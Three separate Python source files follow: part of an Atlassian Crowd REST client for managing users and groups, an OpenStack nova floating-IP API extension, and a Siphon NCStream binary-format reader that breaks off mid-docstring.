True: If session terminated
Raises:
CrowdError: If authentication failed.
"""
url = self.rest_url + "/session/%s" % token
response = self._delete(url)
if response.status_code == 204:
return True
raise CrowdError
def add_user(self, username, **kwargs):
"""Add a user to the directory
Args:
username: The account username
**kwargs: key-value pairs:
password: mandatory
email: mandatory
first_name: optional
last_name: optional
display_name: optional
active: optional (default True)
Returns:
True: Succeeded
False: If unsuccessful
Raises:
CrowdError: If authentication failed.
"""
# Populate data with default and mandatory values.
# A KeyError means a mandatory value was not provided,
# so raise a ValueError indicating bad args.
try:
data = {
"name": username,
"first-name": username,
"last-name": username,
"display-name": username,
"email": kwargs["email"],
"password": {"value": kwargs["password"]},
"active": True
}
except KeyError as e:
raise ValueError("missing %s" % e.message)
# Remove special case 'password'
del(kwargs["password"])
# Put values from kwargs into data
for k, v in kwargs.items():
new_k = k.replace("_", "-")
if new_k not in data:
raise ValueError("invalid argument %s" % k)
data[new_k] = v
response = self._post(self.rest_url + "/user",
data=json.dumps(data))
# Crowd should return 201, 400 or 403
if response.status_code == 201:
return True
if response.status_code == 400:
# User already exists / no password given (but we checked that)
raise CrowdUserExists
if response.status_code == 403:
raise CrowdAuthDenied("application is not allowed to create "
"a new user")
raise CrowdError
def change_password(self, username, newpassword, raise_on_error=False):
"""Change new password for a user
Args:
username: The account username.
newpassword: The account new password.
raise_on_error: optional (default: False)
Returns:
True: Succeeded
False: If unsuccessful
"""
response = self._put(self.rest_url + "/user/password",
data=json.dumps({"value": newpassword}),
params={"username": username})
if response.ok:
return True
if raise_on_error:
raise RuntimeError(response.json()['message'])
return False
def remove_user(self, username):
"""Remove a user from the directory
Args:
username: The account username
Returns:
True: Succeeded
Raises:
CrowdNoSuchUser: If user did not exist
CrowdAuthDenied: If application not allowed to delete the user
"""
response = self._delete(self.rest_url + "/user",
params={"username": username})
# Crowd should return 204, 403 or 404
if response.status_code == 204:
return True
if response.status_code == 403:
raise CrowdAuthDenied("application is not allowed to delete user")
if response.status_code == 404:
# User did not exist
raise CrowdNoSuchUser
raise CrowdError
def remove_group(self, group_name):
"""Remove a group from the directory
Args:
group_name: The group name to remove
Returns:
True: Succeeded
Raises:
CrowdNoSuchGroup: If group did not exist
CrowdAuthDenied: If application not allowed to delete the group
"""
response = self._delete(self.rest_url + "/group",
params={"groupname": group_name})
# Crowd should return 204, 403 or 404
if response.status_code == 204:
return True
if response.status_code == 403:
raise CrowdAuthDenied("application is not allowed to delete user")
if response.status_code == 404:
# User did not exist
raise CrowdNoSuchGroup
raise CrowdError
def get_user(self, username):
"""Retrieve information about a user
Returns:
dict: User information
None: If no such user
Raises:
CrowdError: If unexpected response from Crowd server
"""
response = self._get(self.rest_url + "/user",
params={"username": username,
"expand": "attributes"})
if response.status_code == 200:
return response.json()
if response.status_code == 404:
return None
raise CrowdError
def get_user_direct_group(self, username, groupname):
"""Retrieves the user that is a direct member of the specified group
Returns:
dict: User information
None: If no such user in the group
Raises:
CrowdError: If unexpected response from Crowd server
"""
response = self._get(self.rest_url + "/group/user/direct",
params={"groupname": groupname,
"username": username})
if response.status_code == 200:
return response.json()
if response.status_code == 404:
return None
raise CrowdError
def get_group_by_groupname(self, groupname):
response = self._get(self.rest_url + "/group",
params={"groupname": groupname})
if response.status_code == 200:
return True
return False
def get_child_group_direct(self, groupname):
"""Retrieves the groups that are direct children of the specified group
Returns:
List: Group names
None: If no such group is found
Raises:
CrowdError: If unexpected response from Crowd server
"""
response = self._get(self.rest_url + "/group/child-group/direct",
params={"groupname": groupname})
if response.status_code == 200:
return response.json()
if response.status_code == 404:
return None
raise CrowdError
def get_group_membership(self):
"""Retrieves full details of all group memberships, with users and nested groups.
Returns:
Dict: All group memberships
None: If no such group is found
Raises:
CrowdError: If unexpected response from Crowd server
"""
self.session.headers.update({
"Content-type": "application/xml",
"Accept": "application/xml"
})
response = self._get(self.rest_url + "/group/membership")
if response.status_code == 200:
self.session.headers.update({
"Content-type": "application/json",
"Accept": "application/json"
})
return xmltodict.parse(response.content)
if response.status_code == 404:
self.session.headers.update({
"Content-type": "application/json",
"Accept": "application/json"
})
return None
self.session.headers.update({
"Content-type": "application/json",
"Accept": "application/json"
})
raise CrowdError
def get_group_users_direct(self, groupname):
"""Retrieves the users that are direct members of the specified group
Returns:
List: Users
None: If no such group is found
Raises:
CrowdError: If unexpected response from Crowd server
"""
response = self._get(self.rest_url + "/group/user/direct",
params={"groupname": groupname})
if response.status_code == 200:
return response.json()
if response.status_code == 404:
return None
raise CrowdError
def add_group(self, groupname, **kwargs):
"""Creates a group
Returns:
True: The group was created
Raises:
CrowdGroupExists: The group already exists
CrowdAuthFail
CrowdError: If unexpected response from Crowd server
"""
data = {
"name": groupname,
"description": groupname,
"active": True,
"type": "GROUP"
}
# Put values from kwargs into data
for k, v in kwargs.items():
if k not in data:
raise ValueError("invalid argument %s" % k)
data[k] = v
response = self._post(self.rest_url + "/group",
data=json.dumps(data))
if response.status_code == 201:
return True
if response.status_code == 400:
raise CrowdGroupExists
if response.status_code == 403:
raise CrowdAuthFailure
raise CrowdError("status code %d" % response.status_code)
def get_groups(self, username):
"""Retrieves a list of group names that have <username> as a
direct member.
Returns:
list:
A list of strings of group names.
None: If user not found
Raises:
CrowdError: If unexpected response from Crowd server
"""
response = self._get(self.rest_url + "/user/group/direct",
params={"username": username})
if response.status_code == 200:
return [g['name'] for g in response.json()['groups']]
if response.status_code == 404:
return None
raise CrowdError
def get_nested_groups(self, username):
"""Retrieve a list of all group names that have <username> as
a direct or indirect member.
Args:
username: The account username.
Returns:
list:
A list of strings of group names.
None: If user not found
Raises:
CrowdError: If unexpected response from Crowd server
"""
response = self._get(self.rest_url + "/user/group/nested",
params={"username": username})
if response.status_code == 200:
return [g['name'] for g in response.json()['groups']]
if response.status_code == 404:
return None
raise CrowdError
def get_nested_group_users(self, groupname):
"""Retrieves a list of all users that directly or indirectly
belong to the given groupname.
Args:
groupname: The group name.
Returns:
list:
A list of strings of user names.
"""
response = self._get(self.rest_url + "/group/user/nested",
params={"groupname": groupname,
"start-index": 0,
"max-results": 99999})
if not response.ok:
return None
return [u['name'] for u in response.json()['users']]
def add_user_to_group(self, username, groupname):
"""Make user a direct member of a group
Args:
username: The user name.
groupname: The group name.
Returns:
True: If successful
Raises:
CrowdNoSuchUser: The user does not exist
CrowdNoSuchGroup: The group does not exist
CrowdUserExists: The user is already a member
CrowdError: Unexpected response
"""
response = self._post(self.rest_url + "/group/user/direct",
data=json.dumps({"name": username}),
params={"groupname": groupname})
if response.status_code == 201:
return True
if response.status_code == 400:
raise CrowdNoSuchUser
if response.status_code == 404:
raise CrowdNoSuchGroup
if response.status_code == 409:
raise CrowdUserExists
raise CrowdError("received server response %d" % response.status_code)
def add_child_group_to_group(self, parentgroupname, childgroupname):
    """Make one group a direct child of another group.

    (Docstring corrected: it was previously copied verbatim from
    ``add_user_to_group``.)

    Args:
        parentgroupname: Name of the parent group.
        childgroupname: Name of the group to nest under the parent.

    Returns:
        True: If successful

    Raises:
        CrowdNoSuchUser: Server rejected the request (HTTP 400).
            NOTE(review): despite the exception name, for this group
            endpoint 400 presumably means a bad/missing group --
            confirm against the Crowd REST API docs.
        CrowdNoSuchGroup: The group does not exist (HTTP 404)
        CrowdError: Unexpected response
    """
    response = self._post(self.rest_url + "/group/child-group/direct",
                          data=json.dumps({"name": childgroupname}),
                          params={"groupname": parentgroupname})
    if response.status_code == 201:
        return True
    if response.status_code == 400:
        raise CrowdNoSuchUser
    if response.status_code == 404:
        raise CrowdNoSuchGroup
    raise CrowdError("received server response %d" % response.status_code)
def remove_child_group_from_group(self, parentgroupname, childgroupname):
    """Remove a direct parent/child relationship between two groups.

    (Docstring corrected: it was previously copied verbatim from
    ``add_user_to_group``.)

    Args:
        parentgroupname: Name of the parent group.
        childgroupname: Name of the child group to detach.

    Returns:
        True: If successful

    Raises:
        CrowdAuthDenied: Application may not modify the group (HTTP 403)
        CrowdNoSuchUser: HTTP 404.
            NOTE(review): the name suggests a missing user, but for this
            group endpoint 404 presumably means the group was not found
            -- confirm against the Crowd REST API docs.
        CrowdError: Unexpected response
    """
    response = self._delete(self.rest_url + "/group/child-group/direct",
                            params={"groupname": parentgroupname,
                                    "child-groupname": childgroupname})
    if response.status_code == 204:
        return True
    if response.status_code == 403:
        raise CrowdAuthDenied("application is not allowed to delete group")
    if response.status_code == 404:
        # NOTE(review): raises CrowdNoSuchUser even though this is a
        # group operation; kept for backward compatibility.
        raise CrowdNoSuchUser
    raise CrowdError("received server response %d" % response.status_code)
def remove_user_from_group(self, username, groupname):
"""Remove user as a direct member of a group
Args:
username: The user name.
groupname: The group name.
Returns:
True: If successful
Raises:
CrowdNotFound: The user or group does not exist
CrowdUserExists: The user is already a member
CrowdError: Unexpected response
"""
response = self._delete(self.rest_url + "/group/user/direct",
params={"groupname": groupname,
"username": username})
if response.status_code == 204:
return True
if response.status_code == 404:
# user or group does not exist
j = response.json()
if j['message'].lower().startswith('group'):
raise CrowdNoSuchGroup
elif j['message'].lower().startswith('user'):
raise CrowdNoSuchUser
else:
raise CrowdError("unknown server response")
raise CrowdError
def user_exists(self, username):
"""Determines if the user exists.
Args:
username: The user name.
Returns:
bool:
True if the user exists in the Crowd application.
"""
response = self._get(self.rest_url + "/user",
params={"username": username})
if not response.ok:
return None
return True
def group_exists(self, group):
"""Determines if the group exists.
Args:
group: The group name.
Returns:
bool:
True if the group exists in the Crowd application.
"""
response = self._get(self.rest_url + "/group",
params={"groupname": group})
if not response.ok:
return None
return True
def get_cookie_config(self):
"""Gets the cookie configuration of crowd.
Returns:
json:
<domain>.atlassian.com</domain>
<secure>true</secure>
<name>cookie-name</name>
"""
response = self._get(self.rest_url + "/config/cookie")
if response.status_code == 200:
return response.json()
raise CrowdError("received server response %d" % response.status_code)
# def search(self, entity_type, property_name, search_string):
# """Performs a user search using the Crowd search API.
# https://developer.atlassian.com/display/CROWDDEV/Crowd+REST+Resources#CrowdRESTResources-SearchResource
# Args:
# entity_type: 'user' or 'group'
# property_name: eg. 'email', 'name'
# search_string: the string to search for.
# Returns:
# json results:
# Returns search results.
# """
#
# params = {
# "entity-type": entity_type,
# "expand": entity_type,
# "max-results": 10000,
# "property-search-restriction": {
# "property": {"name": property_name, "type": "STRING"},
# "match-mode": "CONTAINS",
# "value": search_string,
# }
# }
#
# params = {
# 'entity-type': entity_type,
# 'expand': entity_type,
# 'max-results': 10000,
# }
# # Construct XML payload of the form:
# # <property-search-restriction>
# # <property>
# # <name>email</name>
# # <type>STRING</type>
# # </property>
# # <match-mode>EXACTLY_MATCHES</match-mode>
# # <value>bob@example.net</value>
# # </property-search-restriction>
#
# root = etree.Element('property-search-restriction')
#
# property_ = etree.Element('property')
# prop_name = etree.Element('name')
# prop_name.text = property_name
# property_.append(prop_name)
# prop_type = etree.Element('type')
# prop_type.text = 'STRING'
# property_.append(prop_type)
# root.append(property_)
#
# match_mode = etree.Element('match-mode')
# match_mode.text = 'CONTAINS'
# root.append(match_mode)
#
# value = etree.Element('value')
# value.text = search_string
# root.append(value)
#
# # Construct the XML payload expected by search API
# payload = '<?xml version="1.0" encoding="UTF-8"?>\n' + etree.tostring(root).decode('utf-8')
#
# # We're sending XML but would like a JSON response
# session = self._build_session(content_type='xml')
# session.headers.update({'Accept': 'application/json'})
# response = session.post(self.rest_url + "/search", params=params, data=payload, timeout=self.timeout)
#
# if not response.ok:
# return None
#
# return response.json()
| |
# Copyright 2011 OpenStack Foundation
# Copyright (c) 2011 X.commerce, a business unit of eBay Inc.
# Copyright 2011 Grid Dynamics
# Copyright 2011 Eldar Nugaev, Kirill Shileev, Ilya Alekseyev
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
import webob
from nova.api.openstack import common
from nova.api.openstack.compute.schemas.v3 import floating_ips
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.api import validation
from nova import compute
from nova.compute import utils as compute_utils
from nova import exception
from nova.i18n import _
from nova.i18n import _LW
from nova import network
from nova.openstack.common import uuidutils
LOG = logging.getLogger(__name__)
ALIAS = 'os-floating-ips'
authorize = extensions.os_compute_authorizer(ALIAS)
def _translate_floating_ip_view(floating_ip):
result = {
'id': floating_ip['id'],
'ip': floating_ip['address'],
'pool': floating_ip['pool'],
}
try:
result['fixed_ip'] = floating_ip['fixed_ip']['address']
except (TypeError, KeyError, AttributeError):
result['fixed_ip'] = None
try:
result['instance_id'] = floating_ip['fixed_ip']['instance_uuid']
except (TypeError, KeyError, AttributeError):
result['instance_id'] = None
return {'floating_ip': result}
def _translate_floating_ips_view(floating_ips):
    """Build the list view for a collection of floating IP records."""
    views = [_translate_floating_ip_view(ip)['floating_ip']
             for ip in floating_ips]
    return {'floating_ips': views}
def get_instance_by_floating_ip_addr(self, context, address):
    """Return the instance associated with a floating IP address.

    Returns None when the address is not associated with any instance.
    Maps network-API lookup failures to HTTP 404/409 responses.
    """
    try:
        instance_id = self.network_api.get_instance_id_by_floating_address(
            context, address)
    except exception.FloatingIpNotFoundForAddress as ex:
        raise webob.exc.HTTPNotFound(explanation=ex.format_message())
    except exception.FloatingIpMultipleFoundForAddress as ex:
        raise webob.exc.HTTPConflict(explanation=ex.format_message())
    if not instance_id:
        return None
    return common.get_instance(self.compute_api, context, instance_id,
                               want_objects=True)
def disassociate_floating_ip(self, context, instance, address):
    """Disassociate *address* from *instance*, mapping errors to HTTP 403."""
    try:
        self.network_api.disassociate_floating_ip(context, instance, address)
    except exception.Forbidden:
        raise webob.exc.HTTPForbidden()
    except exception.CannotDisassociateAutoAssignedFloatingIP:
        explanation = _('Cannot disassociate auto assigned floating ip')
        raise webob.exc.HTTPForbidden(explanation=explanation)
class FloatingIPController(object):
    """The Floating IPs API controller for the OpenStack API."""

    def __init__(self):
        self.compute_api = compute.API(skip_policy_check=True)
        self.network_api = network.API(skip_policy_check=True)
        super(FloatingIPController, self).__init__()

    @extensions.expected_errors((400, 404))
    def show(self, req, id):
        """Return data about the given floating ip."""
        context = req.environ['nova.context']
        authorize(context)
        try:
            floating_ip = self.network_api.get_floating_ip(context, id)
        except (exception.NotFound, exception.FloatingIpNotFound):
            raise webob.exc.HTTPNotFound(
                explanation=_("Floating ip not found for id %s") % id)
        except exception.InvalidID as err:
            raise webob.exc.HTTPBadRequest(explanation=err.format_message())
        return _translate_floating_ip_view(floating_ip)

    @extensions.expected_errors(())
    def index(self, req):
        """Return a list of floating ips allocated to a project."""
        context = req.environ['nova.context']
        authorize(context)
        return _translate_floating_ips_view(
            self.network_api.get_floating_ips_by_project(context))

    @extensions.expected_errors((403, 404))
    def create(self, req, body=None):
        """Allocate a floating ip, optionally from a named pool."""
        context = req.environ['nova.context']
        authorize(context)
        pool = body['pool'] if body and 'pool' in body else None
        try:
            address = self.network_api.allocate_floating_ip(context, pool)
            ip = self.network_api.get_floating_ip_by_address(context, address)
        except exception.NoMoreFloatingIps:
            if pool:
                msg = _("No more floating ips in pool %s.") % pool
            else:
                msg = _("No more floating ips available.")
            raise webob.exc.HTTPNotFound(explanation=msg)
        except exception.FloatingIpLimitExceeded:
            if pool:
                msg = _("IP allocation over quota in pool %s.") % pool
            else:
                msg = _("IP allocation over quota.")
            raise webob.exc.HTTPForbidden(explanation=msg)
        except exception.FloatingIpPoolNotFound as err:
            raise webob.exc.HTTPNotFound(explanation=err.format_message())
        return _translate_floating_ip_view(ip)

    @wsgi.response(202)
    @extensions.expected_errors((400, 403, 404, 409))
    def delete(self, req, id):
        """Release a floating ip, disassociating it first if needed."""
        context = req.environ['nova.context']
        authorize(context)
        # Look up the floating ip record itself.
        try:
            floating_ip = self.network_api.get_floating_ip(context, id)
        except (exception.NotFound, exception.FloatingIpNotFound):
            raise webob.exc.HTTPNotFound(
                explanation=_("Floating ip not found for id %s") % id)
        except exception.InvalidID as err:
            raise webob.exc.HTTPBadRequest(explanation=err.format_message())
        address = floating_ip['address']
        # Find the instance it is attached to, if any.
        instance = get_instance_by_floating_ip_addr(self, context, address)
        try:
            self.network_api.disassociate_and_release_floating_ip(
                context, instance, floating_ip)
        except exception.Forbidden:
            raise webob.exc.HTTPForbidden()
        except exception.CannotDisassociateAutoAssignedFloatingIP:
            raise webob.exc.HTTPForbidden(
                explanation=_('Cannot disassociate auto assigned floating ip'))
class FloatingIPActionController(wsgi.Controller):
    """Adds addFloatingIp/removeFloatingIp actions to server resources."""

    def __init__(self, *args, **kwargs):
        super(FloatingIPActionController, self).__init__(*args, **kwargs)
        self.compute_api = compute.API(skip_policy_check=True)
        self.network_api = network.API(skip_policy_check=True)

    @extensions.expected_errors((400, 403, 404))
    @wsgi.action('addFloatingIp')
    @validation.schema(floating_ips.add_floating_ip)
    def _add_floating_ip(self, req, id, body):
        """Associate floating_ip to an instance."""
        context = req.environ['nova.context']
        authorize(context)
        address = body['addFloatingIp']['address']
        instance = common.get_instance(self.compute_api, context, id,
                                       want_objects=True)
        cached_nwinfo = compute_utils.get_nw_info_for_instance(instance)
        if not cached_nwinfo:
            msg = _('No nw_info cache associated with instance')
            raise webob.exc.HTTPBadRequest(explanation=msg)
        fixed_ips = cached_nwinfo.fixed_ips()
        if not fixed_ips:
            msg = _('No fixed ips associated to instance')
            raise webob.exc.HTTPBadRequest(explanation=msg)
        fixed_address = None
        if 'fixed_address' in body['addFloatingIp']:
            fixed_address = body['addFloatingIp']['fixed_address']
            # Validate that the requested fixed address actually belongs
            # to this instance.
            for fixed in fixed_ips:
                if fixed['address'] == fixed_address:
                    break
            else:
                msg = _('Specified fixed address not assigned to instance')
                raise webob.exc.HTTPBadRequest(explanation=msg)
        if not fixed_address:
            # No explicit fixed address requested: fall back to the
            # instance's first fixed IP.
            fixed_address = fixed_ips[0]['address']
            if len(fixed_ips) > 1:
                LOG.warning(_LW('multiple fixed_ips exist, using the first: '
                                '%s'), fixed_address)
        try:
            self.network_api.associate_floating_ip(context, instance,
                                                   floating_address=address,
                                                   fixed_address=fixed_address)
        except exception.FloatingIpAssociated:
            msg = _('floating ip is already associated')
            raise webob.exc.HTTPBadRequest(explanation=msg)
        except exception.NoFloatingIpInterface:
            msg = _('l3driver call to add floating ip failed')
            raise webob.exc.HTTPBadRequest(explanation=msg)
        except exception.FloatingIpNotFoundForAddress:
            msg = _('floating ip not found')
            raise webob.exc.HTTPNotFound(explanation=msg)
        except exception.Forbidden as e:
            raise webob.exc.HTTPForbidden(explanation=e.format_message())
        except Exception as e:
            msg = _('Unable to associate floating ip %(address)s to '
                    'fixed ip %(fixed_address)s for instance %(id)s. '
                    'Error: %(error)s') % (
                {'address': address, 'fixed_address': fixed_address,
                 'id': id, 'error': e})
            LOG.exception(msg)
            raise webob.exc.HTTPBadRequest(explanation=msg)
        return webob.Response(status_int=202)

    @extensions.expected_errors((400, 403, 404, 409))
    @wsgi.action('removeFloatingIp')
    @validation.schema(floating_ips.remove_floating_ip)
    def _remove_floating_ip(self, req, id, body):
        """Dissociate floating_ip from an instance."""
        context = req.environ['nova.context']
        authorize(context)
        address = body['removeFloatingIp']['address']
        # get the floating ip object
        try:
            floating_ip = self.network_api.get_floating_ip_by_address(context,
                                                                      address)
        except exception.FloatingIpNotFoundForAddress:
            msg = _("floating ip not found")
            raise webob.exc.HTTPNotFound(explanation=msg)
        # get the associated instance object (if any)
        instance = get_instance_by_floating_ip_addr(self, context, address)
        # The URL id may be an instance UUID or a legacy integer id; compare
        # against whichever form it matches.  This replaces the former
        # `(cond and [x] or [y])[0]` Python-2 ternary emulation, which was
        # hard to read but equivalent.
        if uuidutils.is_uuid_like(id):
            matches_instance = bool(instance) and instance.uuid == id
        else:
            matches_instance = bool(instance) and instance.id == id
        # disassociate if associated
        if matches_instance and floating_ip.get('fixed_ip_id'):
            try:
                disassociate_floating_ip(self, context, instance, address)
            except exception.FloatingIpNotAssociated:
                msg = _('Floating ip is not associated')
                raise webob.exc.HTTPBadRequest(explanation=msg)
            return webob.Response(status_int=202)
        else:
            msg = _("Floating ip %(address)s is not associated with instance "
                    "%(id)s.") % {'address': address, 'id': id}
            raise webob.exc.HTTPConflict(explanation=msg)
class FloatingIps(extensions.V3APIExtensionBase):
    """Floating IPs support."""

    name = "FloatingIps"
    alias = ALIAS
    version = 1

    def get_resources(self):
        """Expose the top-level os-floating-ips resource."""
        return [extensions.ResourceExtension(ALIAS, FloatingIPController())]

    def get_controller_extensions(self):
        """Attach the floating-IP action controller to servers."""
        return [extensions.ControllerExtension(
            self, 'servers', FloatingIPActionController())]
| |
# Copyright (c) 2014-2016 Siphon Contributors.
# Distributed under the terms of the BSD 3-Clause License.
# SPDX-License-Identifier: BSD-3-Clause
"""Handle binary stream returns in NCStream format."""
from collections import OrderedDict
import itertools
import logging
import zlib
import numpy as np
from . import cdmrfeature_pb2 as cdmrf
from . import ncStream_pb2 as stream # noqa
MAGIC_HEADER = b'\xad\xec\xce\xda'
MAGIC_DATA = b'\xab\xec\xce\xba'
MAGIC_DATA2 = b'\xab\xeb\xbe\xba'
MAGIC_VDATA = b'\xab\xef\xfe\xba'
MAGIC_VEND = b'\xed\xef\xfe\xda'
MAGIC_ERR = b'\xab\xad\xba\xda'
MAGIC_HEADERCOV = b'\xad\xed\xde\xda'
MAGIC_DATACOV = b'\xab\xed\xde\xba'
log = logging.getLogger(__name__)
log.setLevel(logging.WARNING)
#
# NCStream handling
#
def read_ncstream_data(fobj):
    """Handle reading an NcStream v1 data block from a file-like object.

    Dispatches on the Data message's dataType: string/opaque/vlen payloads,
    primitive arrays (optionally DEFLATE-compressed), structures, and
    sequences each have their own wire layout.

    Parameters
    ----------
    fobj : file-like object
        The file to read from.

    Returns
    -------
    A :class:`numpy.ndarray` for most types, or a ``(Data, list of
    StructureData)`` tuple for SEQUENCE data.
    """
    data = read_proto_object(fobj, stream.Data)
    if data.dataType in (stream.STRING, stream.OPAQUE) or data.vdata:
        log.debug('Reading string/opaque/vlen')
        # Payload is a count followed by that many length-prefixed blocks.
        num_obj = read_var_int(fobj)
        log.debug('Num objects: %d', num_obj)
        blocks = [read_block(fobj) for _ in range(num_obj)]
        if data.dataType == stream.STRING:
            blocks = [b.decode('utf-8', errors='ignore') for b in blocks]
        # Again endian isn't coded properly
        dt = data_type_to_numpy(data.dataType).newbyteorder('>')
        if data.vdata:
            # Variable-length data: keep each block as its own sub-array.
            return np.array([np.frombuffer(b, dtype=dt) for b in blocks], dtype=object)
        else:
            return np.array(blocks, dtype=dt)
    elif data.dataType in _dtype_lookup:
        log.debug('Reading array data')
        bin_data = read_block(fobj)
        log.debug('Binary data: %s', bin_data)
        # Hard code to big endian for now since it's not encoded correctly
        dt = data_type_to_numpy(data.dataType).newbyteorder('>')
        # Handle decompressing the bytes
        if data.compress == stream.DEFLATE:
            bin_data = zlib.decompress(bin_data)
            assert len(bin_data) == data.uncompressedSize
        elif data.compress != stream.NONE:
            raise NotImplementedError(f'Compression type {data.compress} not implemented!')
        # Turn bytes into an array
        return reshape_array(data, np.frombuffer(bin_data, dtype=dt))
    elif data.dataType == stream.STRUCTURE:
        sd = read_proto_object(fobj, stream.StructureData)
        # Make a datatype appropriate to the rows of struct
        endian = '>' if data.bigend else '<'
        dt = np.dtype([(endian, np.void, sd.rowLength)])
        # Turn bytes into an array
        return reshape_array(data, np.frombuffer(sd.data, dtype=dt))
    elif data.dataType == stream.SEQUENCE:
        log.debug('Reading sequence')
        blocks = []
        # Sequence items are StructureData messages delimited by magic
        # markers and terminated by MAGIC_VEND.
        magic = read_magic(fobj)
        while magic != MAGIC_VEND:
            if magic == MAGIC_VDATA:
                log.error('Bad magic for struct/seq data!')
            blocks.append(read_proto_object(fobj, stream.StructureData))
            magic = read_magic(fobj)
        return data, blocks
    else:
        raise NotImplementedError(f"Don't know how to handle data type: {data.dataType}")
def read_ncstream_data2(fobj):
    """Handle reading an NcStream v2 data block from a file-like object."""
    return datacol_to_array(read_proto_object(fobj, stream.DataCol))
def read_ncstream_err(fobj):
    """Read an NcStream error message and raise it as a RuntimeError."""
    raise RuntimeError(read_proto_object(fobj, stream.Error).message)
# Dispatch table mapping NcStream v1/v2 magic byte markers to the reader
# that handles the message that follows each marker.
ncstream_table = {MAGIC_HEADER: lambda f: read_proto_object(f, stream.Header),
                  MAGIC_DATA: read_ncstream_data,
                  MAGIC_DATA2: read_ncstream_data2,
                  MAGIC_ERR: read_ncstream_err}
def read_ncstream_messages(fobj):
    """Read every NcStream message available from a file-like object."""
    return read_messages(fobj, ncstream_table)
#
# CDMRemoteFeature handling
#
# Dispatch table mapping CDMRemoteFeature magic byte markers to readers.
cdmrf_table = {MAGIC_HEADERCOV: lambda f: read_proto_object(f, cdmrf.CoverageDataset),
               MAGIC_DATACOV: lambda f: read_proto_object(f, cdmrf.CoverageDataResponse),
               MAGIC_DATA2: read_ncstream_data2,  # For coordinates
               MAGIC_ERR: read_ncstream_err}
def read_cdmrf_messages(fobj):
    """Read every CDMRemoteFeature message available from a file-like object."""
    return read_messages(fobj, cdmrf_table)
#
# General Utilities
#
def read_messages(fobj, magic_table):
    """Read messages from *fobj* until the stream is exhausted.

    Each message is a 4-byte magic marker followed by a payload; the
    handler for each marker comes from *magic_table*.  Unknown markers
    are logged and skipped.
    """
    results = []
    while True:
        magic = read_magic(fobj)
        if not magic:
            # Empty read: end of stream.
            return results
        handler = magic_table.get(magic)
        if handler is None:
            log.error('Unknown magic: ' + str(' '.join(f'{b:02x}'
                                                       for b in bytearray(magic))))
        else:
            results.append(handler(fobj))
def read_proto_object(fobj, klass):
    """Read a length-prefixed block and parse it as a *klass* protobuf message."""
    log.debug('%s chunk', klass.__name__)
    message = klass()
    message.ParseFromString(read_block(fobj))
    log.debug('Header: %s', str(message))
    return message
def read_magic(fobj):
    """Read the next 4-byte magic marker.

    Parameters
    ----------
    fobj : file-like object
        The file to read from.

    Returns
    -------
    bytes
        The magic byte sequence; empty at end of stream.
    """
    return fobj.read(4)
def read_block(fobj):
    """Read one length-prefixed block.

    The block is preceded by its byte count encoded as a variable-length
    integer (see :func:`read_var_int`).

    Parameters
    ----------
    fobj : file-like object
        The file to read from.

    Returns
    -------
    bytes
        The block contents.
    """
    size = read_var_int(fobj)
    log.debug('Next block: %d bytes', size)
    return fobj.read(size)
def process_vlen(data_header, array):
    """Slice a flat primitive array into variable-length sub-sequences.

    Consumes *array* front-to-back, cutting off one piece per entry in
    ``data_header.vlens`` and returning the pieces as an object array.

    Parameters
    ----------
    data_header : Header
    array : :class:`numpy.ndarray`

    Returns
    -------
    ndarray
        object array containing sub-sequences from the original primitive array
    """
    remaining = iter(array)
    pieces = [np.fromiter(itertools.islice(remaining, count), dtype=array.dtype)
              for count in data_header.vlens]
    return np.array(pieces, dtype=object)
def datacol_to_array(datacol):
    """Convert DataCol from NCStream v2 into an array with appropriate type.

    Depending on the data type specified, this extracts data from the appropriate members
    and packs into a :class:`numpy.ndarray`, recursing as necessary for compound data types.

    Parameters
    ----------
    datacol : DataCol

    Returns
    -------
    ndarray
        array containing extracted data
    """
    if datacol.dataType == stream.STRING:
        arr = np.array(datacol.stringdata, dtype=object)
    elif datacol.dataType == stream.OPAQUE:
        arr = np.array(datacol.opaquedata, dtype=object)
    elif datacol.dataType == stream.STRUCTURE:
        # Recurse into each member column, preserving member order.
        members = OrderedDict((mem.name, datacol_to_array(mem))
                              for mem in datacol.structdata.memberData)
        log.debug('Struct members:\n%s', str(members))
        # str() around name necessary because protobuf gives unicode names, but dtype doesn't
        # support them on Python 2
        dt = np.dtype([(str(name), arr.dtype) for name, arr in members.items()])
        log.debug('Struct dtype: %s', str(dt))
        # Assemble the record array field-by-field from the member columns.
        arr = np.empty((datacol.nelems,), dtype=dt)
        for name, arr_data in members.items():
            arr[name] = arr_data
    else:
        # Make an appropriate datatype
        endian = '>' if datacol.bigend else '<'
        dt = data_type_to_numpy(datacol.dataType).newbyteorder(endian)
        # Turn bytes into an array
        arr = np.frombuffer(datacol.primdata, dtype=dt)
        if arr.size != datacol.nelems:
            log.warning('Array size %d does not agree with nelems %d',
                        arr.size, datacol.nelems)
        if datacol.isVlen:
            arr = process_vlen(datacol, arr)
            try:
                arr = reshape_array(datacol, arr)
            except ValueError:
                # In this case, the array collapsed, need different resize that
                # correctly sizes from elements
                shape = tuple(r.size for r in datacol.section.range) + (datacol.vlens[0],)
                arr = arr.reshape(*shape)
        else:
            arr = reshape_array(datacol, arr)
    return arr
def reshape_array(data_header, array):
    """Reshape *array* to the shape given by the header's section ranges.

    When the header specifies no ranges (scalar / unshaped data) the
    array is returned unchanged.

    Parameters
    ----------
    array : :class:`numpy.ndarray`
    data_header : Data
    """
    dims = tuple(r.size for r in data_header.section.range)
    return array.reshape(*dims) if dims else array
# Map NcStream primitive data-type codes to numpy dtype strings.
# STRUCTURE (8) and SEQUENCE (9) are compound types and handled separately,
# so they deliberately have no entry here.
# STRUCTURE = 8;
# SEQUENCE = 9;
_dtype_lookup = {stream.CHAR: 'S1', stream.BYTE: 'b', stream.SHORT: 'i2',
                 stream.INT: 'i4', stream.LONG: 'i8', stream.FLOAT: 'f4',
                 stream.DOUBLE: 'f8', stream.STRING: 'O',
                 stream.ENUM1: 'B', stream.ENUM2: 'u2', stream.ENUM4: 'u4',
                 stream.OPAQUE: 'O', stream.UBYTE: 'B', stream.USHORT: 'u2',
                 stream.UINT: 'u4', stream.ULONG: 'u8'}
def data_type_to_numpy(datatype, unsigned=False):
    """Convert an ncstream datatype to a numpy dtype.

